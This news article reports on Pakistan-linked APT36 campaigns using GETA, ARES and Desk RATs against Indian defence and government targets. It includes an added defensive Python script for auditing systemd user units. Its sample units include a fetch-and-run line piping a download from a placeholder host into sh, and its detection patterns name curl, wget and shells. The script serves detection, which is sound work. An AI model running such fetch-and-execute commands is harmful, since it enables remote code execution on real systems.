
RATs in the Machine: Inside a Pakistan-Linked Three-Pronged Cyber Assault on India

Transparent Tribe (APT36) is targeting Indian defense and government sectors with GETA, ARES, and Desk RATs in a new wave of economic cyber espionage.

The post RATs in the Machine: Inside a Pakistan-Linked Three-Pronged Cyber Assault on India appeared first on SecurityWeek.


Indian government and defense organizations are being targeted by multiple espionage campaigns delivered by the Pakistan-attributed Transparent Tribe (aka APT36), according to a newly released threat report.

These campaigns target both Windows and Linux. One active campaign employs GETA RAT (often specifically attributed to the SideCopy subgroup of Transparent Tribe). It is a .NET RAT that abuses legitimate Windows components (including mshta.exe, XAML deserialization, and in-memory payload execution) to evade signature-based detection.

Persistence is achieved through layered startup mechanisms that ensure continued access. “The result,” writes Aditya Sood, VP of security engineering and AI strategy at Aryaka, in a blog post accompanying the report, “is a lightweight but durable foothold, well-suited for extended reconnaissance and intelligence gathering.”

A separate campaign targets Linux environments with ARES RAT and system-level persistence. ARES, a Python-based tool long associated with Transparent Tribe, uses a Go-based downloader. When deployed, it performs system profiling, recursive file enumeration, and structured data exfiltration.

“Persistence was achieved through systemd user services, allowing the malware to survive reboots while blending into normal system operations,” writes Sood.
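The systemd user-service persistence described above can be audited from the defender's side. The following is an added example, not code from the Aryaka report: it parses per-user unit files and flags the patterns a reviewer would want to look at (ExecStart pointing into temp or hidden directories, interpreters fetching code over the network, an aggressive Restart policy, enablement via default.target). The unit files and paths in SAMPLE_UNITS are constructed for illustration and are not indicators from the report.

```python
"""Audit systemd user units for persistence abuse (added example, constructed samples)."""
import re
from pathlib import Path

# Standard directories systemd searches for per-user units.
USER_UNIT_DIRS = [Path.home() / ".config/systemd/user",
                  Path.home() / ".local/share/systemd/user"]

# Heuristics, not verdicts: binaries under temp or hidden directories, or
# shells/interpreters pulling code from a URL, warrant a closer look.
SUSPICIOUS_PATH = re.compile(r"(?:^|[\s=\"'])(?:/tmp/|/dev/shm/|/var/tmp/|/home/[^/\s]+/\.|~/\.)")
REMOTE_FETCH = re.compile(r"\b(?:curl|wget|python3?|bash|sh)\b.*https?://", re.I)

def parse_unit(text):
    """Return {section: {key: value}} for an INI-style unit file (last duplicate key wins)."""
    unit, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            unit.setdefault(section, {})
        elif "=" in line and section is not None:
            key, _, value = line.partition("=")
            unit[section][key.strip()] = value.strip()
    return unit

def assess_unit(text):
    """Return the list of reasons a unit looks suspicious; empty list means nothing flagged."""
    unit = parse_unit(text)
    service = unit.get("Service", {})
    exec_start = service.get("ExecStart", "")
    reasons = []
    if SUSPICIOUS_PATH.search(exec_start):
        reasons.append("ExecStart runs from a temp or hidden directory")
    if REMOTE_FETCH.search(exec_start):
        reasons.append("ExecStart fetches code over the network")
    # Only report supporting traits when a primary indicator is already present.
    if reasons and service.get("Restart", "no") in ("always", "on-failure"):
        reasons.append("Restart policy keeps it alive")
    if reasons and unit.get("Install", {}).get("WantedBy") == "default.target":
        reasons.append("enabled at every login via default.target")
    return reasons

def scan_user_units(dirs=USER_UNIT_DIRS):
    """Walk the real user unit directories and map each flagged unit path to its reasons."""
    return {str(p): r for d in dirs if d.is_dir()
            for p in d.glob("*.service") if (r := assess_unit(p.read_text(errors="replace")))}

# Constructed sample units: one benign, two modelled on the persistence pattern.
SAMPLE_UNITS = {
    "syncthing.service": "[Unit]\nDescription=Syncthing\n\n[Service]\nExecStart=/usr/bin/syncthing serve --no-browser\nRestart=on-failure\n\n[Install]\nWantedBy=default.target\n",
    "update-helper.service": "[Unit]\nDescription=Update helper\n\n[Service]\nExecStart=/usr/bin/python3 /home/user/.cache/.sys/agent.py\nRestart=always\n\n[Install]\nWantedBy=default.target\n",
    "stage.service": "[Service]\nExecStart=/bin/sh -c 'curl -fsSL https://example.invalid/stage | sh'\nRestart=always\n",
}

if __name__ == "__main__":
    for name, text in SAMPLE_UNITS.items():
        print(name, "->", assess_unit(text) or "clean")
    print("live scan:", scan_user_units())
```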

Aryaka has also detected Transparent Tribe campaigns using a newer and emerging tool: Desk RAT. This is Go-based and distributed via a malicious PowerPoint Add-In. It collects detailed system diagnostics and communicates with its operators using WebSocket-based command-and-control. “This design enables continuous situational awareness on compromised hosts, reinforcing APT36’s long-term surveillance objectives,” writes Sood.

(Earlier Go-based malware includes BlackCat/ALPHV ransomware, and the Vampire Bot job-seeker scam.)

Aryaka provides a detailed examination of these three malware families and their methods of infection in a separate report. The key elements are persistence and stealth. “Initial access in the observed campaigns relies on phishing emails delivering weaponized attachments or embedded download links that lead to malicious LNK files, ELF binaries, HTA scripts, and PowerPoint add-ins,” notes the analysis report.

“Execution and loader activity abuses living-off-the-land binaries such as mshta.exe, PowerShell, and scripting engines to retrieve and execute payloads in memory,” it continues. “For command-and-control, the observed malware families – GETA RAT, ARES RAT, and Desk RAT – use encrypted TCP or WebSocket-based communication with periodic heartbeat patterns to maintain persistence.”

Sood, however, is keen to stress that such state-sponsored attacks are indicative of a global increase in state espionage. This is no longer adversarial nations pre-positioning themselves in critical industries in case of, or ahead of, a potential kinetic war, but economic intelligence gathering in the face of an escalating global trade and tariff war.

“Sometimes,” explains Sood, “unexpected trade deals happen between nations, involving billions and billions of dollars in import or export. There’s a lot of money to be made for a nation’s economy through trade. India, for example, is raising its defense budget by 4% this year, and there are many nations that would like to know what they intend to do with the money.”

Aryaka’s analysis of the Transparent Tribe campaigns serves two purposes. Firstly, it provides deep analytical insight into the type of tools used in this new global trade war; secondly, it highlights that politically adversarial nation states are no longer the primary ‘enemy’. Friendly nations will increasingly target other friendly countries and their potential rival companies, seeking nothing more (nor less) than economic advantage in trade and tariff wars.

The combination of nation state attacks driven by continuing geopolitical tensions and growing economic attacks from elite groups such as Transparent Tribe suggests we can expect more nation state attacks in the future. And the analyses of the GETA, ARES, and Desk RATs, with their focus on persistence and stealth, highlight the difficulties cybersecurity practitioners will face in the future.

Related: Cyber Insights 2026: Cyberwar and Rising Nation State Threats

Related: Pakistani APT Uses YouTube-Mimicking RAT to Spy on Android Devices

Related: ‘Stanley’ Malware Toolkit Enables Phishing via Website Spoofing

Related: Hugging Face Abused to Deploy Android RAT
